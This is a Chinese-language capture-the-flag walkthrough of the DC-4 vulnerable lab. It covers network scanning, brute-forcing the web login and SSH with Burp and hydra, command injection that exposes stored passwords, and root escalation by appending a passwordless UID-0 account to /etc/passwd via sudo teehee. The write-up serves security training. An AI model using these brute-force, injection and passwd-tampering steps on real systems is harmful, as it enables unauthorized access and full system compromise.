DC-4 | Lluna's Pure land.

0x00.官网描述

DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
DC-3之后不再有提示信息，只有一个最终flag

0x01.老规矩上nmap

可以发现1为网关，2为宿主机，6为kali，那么3就是我们的受害者

root@JIYE:~/tmp/DC4# nmap -sP 192.168.1.0/24 -oN nmap.sP
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 21:44 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0020s latency).
MAC Address: 68:D1:BA:1F:FD:48 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.1.2
Host is up (0.00029s latency).
MAC Address: 50:5B:C2:8C:BE:A5 (Liteon Technology)
Nmap scan report for 192.168.1.3
Host is up (0.00027s latency).
MAC Address: 00:0C:29:B7:2E:67 (VMware)
Nmap scan report for 192.168.1.6
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds

0x02.继续nmap扫描服务及端口

发现开放了22/80端口

root@JIYE:~/tmp/DC4# nmap -A 192.168.1.3 -oN nmap.A
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 21:46 EDT
Nmap scan report for 192.168.1.3
Host is up (0.00034s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
MAC Address: 00:0C:29:B7:2E:67 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.34 ms 192.168.1.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.53 seconds

0x03.访问80端口

发现只有一个admin登入框

0x04.使用bp爆破

1.抓包

POST /login.php HTTP/1.1
Host: 192.168.1.3
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.3
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.3/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: has_js=1; SESS3d56985a7fb178e8eb469ddb59bb6550=6flnn9PeYpt0eXlfkyxJlP9vjJwA3UhQ4nszAdkawro; Drupal.toolbar.collapsed=0; PHPSESSID=cdfml2498srtgu1effus59caj4
Connection: close

username=admin&password=admin

2.爆破密码

添加字典

字典为：
/usr/share/john/password.lst

添加线程数

爆破，得到admin密码

0x05.登入

发现两个按钮

点击，查看

0x06.继续抓包，查看命令是如何执行的

更换其他系统命令，可以执行，判断存在命令注入漏洞，并发现了几个用户

查看home目录

每个家目录都查看一下，发现一个old-passwords.bak

将用户与密码编辑为字典用于爆破

1
2
3

root@JIYE:~/tmp/DC4# ls
nmap.A  nmap.sP  old-passwords.bak  users.bak
root@JIYE:~/tmp/DC4#

0x07.ssh爆破

由于开放了ssh端口，可以进行ssh爆破

1	root@JIYE:~/tmp/DC4# hydra -L users.bak -P old-passwords.bak ssh://192.168.1.3 -vV -f -o hydra.ssh

爆破成功一个用户

root@JIYE:~/tmp/DC4# cat hydra.ssh 
# Hydra v9.1 run at 2020-08-22 22:49:20 on 192.168.1.3 ssh (hydra -L users.bak -P old-passwords.bak -vV -f -o hydra.ssh ssh://192.168.1.3)
[22][ssh] host: 192.168.1.3   login: jim   password: jibril04
root@JIYE:~/tmp/DC4#

0x08.ssh登入

root@JIYE:~/tmp/DC4# ssh jim@192.168.1.3
jim@192.168.1.3's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Aug 23 13:35:56 2020 from 192.168.1.6
jim@dc-4:~$ whoami
jim
jim@dc-4:~$

检查文件，发现一封来自root的邮件

jim@dc-4:~$ ls -l
total 12
drwxr-xr-x 2 jim jim 4096 Apr  7  2019 backups
-rw------- 1 jim jim  528 Apr  6  2019 mbox
-rwsrwxrwx 1 jim jim  174 Apr  6  2019 test.sh
jim@dc-4:~$ cat mbox 
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
        (envelope-from <root@dc-4>)
        id 1hCiQe-0000gc-EC
        for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

根据思路查看还有没有其他邮件，结果得到charles的密码

jim@dc-4:~$ cd /var/mail/
jim@dc-4:/var/mail$ ls -l
total 4
-rw-rw---- 1 jim mail 715 Apr  6  2019 jim
jim@dc-4:/var/mail$ 
jim@dc-4:/var/mail$ 
jim@dc-4:/var/mail$ cat jim 
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
        (envelope-from <charles@dc-4>)
        id 1hCjIX-0000kO-Qt
        for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&hvim0y

See ya,
Charles

jim@dc-4:/var/mail$

0x09.提权

1.使用sudo -l

jim用户不能使用sudo -l

jim@dc-4:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for jim: 
Sorry, user jim may not run sudo on dc-4.
jim@dc-4:~$

2.切换charles用户

发现可以使用teehee命令提权

root@JIYE:~# ssh charles@192.168.1.3
charles@192.168.1.3's password: 
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
charles@dc-4:~$

查看teehee参数，发现-a参数为追加文件且不覆盖

charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'
charles@dc-4:~$

3.teehee提权

向/etc/passwd追加文件

/etc/passwd文件一共有7个字段
第一个字段代表用户名；
第二个字段代表是否有密码保护；
第三个字段表示UID，为0表示root用户；
第四个字段表示GID；
第五个字段表示用户全称；
第六个字段表示用户家目录；
第七个字段表示用什么shell来解析执行

为root用户添加别名

charles@dc-4:~$ echo "fjy::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
fjy::0:0:::/bin/bash
charles@dc-4:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
nginx:x:107:111:nginx user,,,:/nonexistent:/bin/false
charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
jim:x:1002:1002:Jim,,,:/home/jim:/bin/bash
sam:x:1003:1003:Sam,,,:/home/sam:/bin/bash
Debian-exim:x:108:112::/var/spool/exim4:/bin/false
fjy::0:0:::/bin/bash
charles@dc-4:~$

登入

charles@dc-4:~$ su fjy
root@dc-4:/home/charles# cd
root@dc-4:/root# ls
flag.txt
root@dc-4:/root# cat flag.txt 



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  "Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "  
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
root@dc-4:/root#